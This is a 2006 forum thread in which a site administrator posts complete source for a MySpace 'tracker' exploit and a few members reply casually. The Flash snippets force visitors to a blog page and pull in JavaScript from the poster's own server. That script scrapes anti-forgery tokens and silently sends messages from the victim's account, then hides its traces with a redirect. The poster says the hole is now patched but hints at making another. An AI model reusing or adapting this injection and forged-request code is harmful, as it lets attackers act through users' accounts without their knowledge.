1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

The mySpace tracker source code.

Discussion in 'Computers, Games, Electronics etc' started by VTECin5th, May 18, 2006.

  1. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    I wanted to post this up to give an insight on what runs things like the (expired) myspace tracker.
    This may be helpful to 0.1% of those who read it, or passer by'ers...I think Tom follows this thread.
    :p

    This required 2 flash movies and 1 javascript.
    1 Flash movie forced the user to the blog page. (Because the hole existed in the blog page)
    1 Flash movie called javascript into the page because myspace 'forgot' to sanitize the flash movie with
    allowScriptAccess="Never" (which they added, and that's why it's fixed now)

    Flash 1 (set cookie and force user to blog):
    Code:
    mySharedObject = SharedObject.getLocal("counter");
    function doitnow(){
    clearInterval(loads);
    var poo = myIdy0;
    var tme = new Date();
    var secs = tme.getTime() / 1000;
    var secs = Math.floor(secs);
    var pood = secs;
    _root.lol = mySharedObject.data.count;
    if (pood - 30 >= _root.lol){
    mySharedObject.data.count = secs;
    mySharedObject.flush();
    getURL("http://blog.myspace.com/" + poo, "_self");
    }
    else
    {
    mySharedObject.data.count = secs;
    mySharedObject.flush();
    } 
    } 
    var loads = setInterval(doitnow, 1200);
    
    Flash 2 (Call in javascript 'script src' from my server):
    Code:
    getURL("java script:document.writeln(%22%3CScript src%3Dhttp%3A%2F%2FnittoRevolution.net%2FmySpacez.js%3E%3C%2Fscript%3E%22)", "");
    
    The reason I really liked this method was that, i controlled both parts of it, meaning i could make remote changes at any time to improve the script.

    Now for the JS(makes the silent calls to send the message,then redirects back to main profile page):

    Code:
    var http_request = false;
    var http_xml = false;
    var this_url = escape(self.location);
    var first_split = this_url.split('m/');
    var getID = first_split[1];
    if(getID.length > 12){
    var thisl = self.location;
    vtak(thisl);
    }
    else{
    start(getID);
    setTimeout("destruct()",3000);
    }
    function vtak(uid) {
    var showNormal = uid;
    if (window.XMLHttpRequest) {
    makehis = new XMLHttpRequest();
    }
    else if (window.ActiveXObject){
    makehis = new ActiveXObject("Microsoft.XMLHTTP");
    }
    makehis.onreadystatechange = norm;
    makehis.open("GET",showNormal,true);
    makehis.send(null);
    }
    function norm(){
    if (makehis.readyState == 4){
    if (makehis.status == 200){
    var getN = makehis.responseText;
    var rep = getN.replace('.swf','');
    document.write(rep);
    }
    }
    }
    function start(FinalID){
    var omgz = "http://blog.myspace.com/index.cfm?fuseaction=mail.message&FriendID=" + FinalID;
    makeRequest(omgz);
    }
    function makeRequest(url) {
    if (window.XMLHttpRequest) {
    http_request = new XMLHttpRequest();
    }
    else if (window.ActiveXObject){
    http_request = new ActiveXObject("Microsoft.XMLHTTP");
    }
    http_request.onreadystatechange = doCon;
    http_request.open("GET",url,true); 
    http_request.send(null);
    }
    function doCon(){
    if (http_request.readyState == 4){
    if (http_request.status == 200){
    var getData = http_request.responseText;
    var hash1 = getData.split("hashcode");
    var hash2 = hash1[1];
    var getRest = hash1[1];
    var getMore = getRest;
    var getMore2 = getMore;
    var hash3 = hash2.split('value="');
    var hash4 = hash3[1];
    var hash5 = hash4.split('">');
    var gotHash = hash5[0];
    var toID = getRest.split('toUserID');
    var toID2 = toID[1];
    var toID3 = toID2.split('value="');
    var toID4 = toID3[1];
    var toID5 = toID4.split('">');
    var gotID = toID5[0];
    var toke = getMore.split('Mytoken');
    var toke2 = toke[1];
    var toke3 = toke2.split('value=');
    var toke4 = toke3[1];
    var toke5 = toke4.split('>');
    var gotTok = toke5[0];
    urlMail = "http://blog.myspace.com/index.cfm?fuseaction=mail.sendmessage";
    urlStr2 = "&hashcode=" + gotHash + "&messageType=0&toUserID=" + gotID + "&Mytoken=" + gotTok + "&errorReturnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.message%26friendID%3D" + gotID + "&returnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.messagesent%26friendID%3D" + gotID + "&subject=(Visitor)&mailbody=Just+Looking";
    vcon(urlMail,urlStr2,gotID);
    }
    }
    }
    function vcon(prl,pdt,id) {
    if (window.XMLHttpRequest) {
    make_this = new XMLHttpRequest();
    }
    else if (window.ActiveXObject){
    make_this = new ActiveXObject("Microsoft.XMLHTTP");
    }
    make_this.open("POST",prl,true);
    make_this.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 
    make_this.send(pdt);
    vtax(id);
    }
    function vtax(oid) {
    var OGL = "http://blog.mySpace.com/" + oid;
    if (window.XMLHttpRequest) {
    makethis = new XMLHttpRequest();
    }
    else if (window.ActiveXObject){
    makethis = new ActiveXObject("Microsoft.XMLHTTP");
    }
    makethis.onreadystatechange = omg;
    makethis.open("GET",OGL,true);
    makethis.send(null);
    }
    function omg(){
    // This function reads in the blog page
    // and removes the flash movie so that it doesn't forward them away same as norm()
    if (makethis.readyState == 4){
    if (makethis.status == 200){
    var getz = makethis.responseText;
    moo = getz.replace(".swf","");
    document.write(moo);
    destruct();
    }
    }
    }
    function destruct(){
    location='http://www.myspace.com/' + getID;
    }
    
    There's a lot of things that be built to run just like this all over the interweb.
    PS Tom, yea I'll work for you for $100,000 a month. :p
     
  2. get_nick

    get_nick These snozzberries taste like snozzberries... VIP

    Messages:
    11,937
    Likes Received:
    1,056
    Joined:
    Apr 21, 2003
    Location:
    Washington State
    do you think that your past run-ins with myspace caused it to be found, or do you think that somebody ran their mouth off? Do you really think tom follows the thread?
     
  3. YouKnowWhoIBee

    YouKnowWhoIBee my avatar is better.

    Messages:
    2,257
    Likes Received:
    7
    Joined:
    Dec 22, 2003
    Location:
    Maryland
  4. Dustin_m

    Dustin_m Active Member

    Messages:
    4,603
    Likes Received:
    16
    Joined:
    May 21, 2003
    Location:
    San Diego, CA
    i'm not pressing that shit.

    shouldn't you be packing your shit right now anyways :p
     
  5. YouKnowWhoIBee

    YouKnowWhoIBee my avatar is better.

    Messages:
    2,257
    Likes Received:
    7
    Joined:
    Dec 22, 2003
    Location:
    Maryland
    oh haha... i am watching this movie that i posted in the members lounge... i have been laughing for hours. Plus i decided to get some sechs tonight! so i am happy :)
     
  6. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    I am almost SURE someone ran their mouth off...
    Remember that there's 2 sides to this: The people who want to use it, and the people who DON'T want it used on them.
    My previous run-ins probably didn't help much.
    I doubt that Tom follows this thread, but someone among us is helping to pass the word :ph34r:

    You click it, tell me if it works, after it doesn't I'll keep my plans to make another one later :p
     
  7. kyleirwin

    kyleirwin Retired OG

    Messages:
    2,420
    Likes Received:
    2
    Joined:
    Oct 24, 2002
    Location:
    Vegas
    so what does this do?
     
Verification:
Draft saved Draft deleted

Share This Page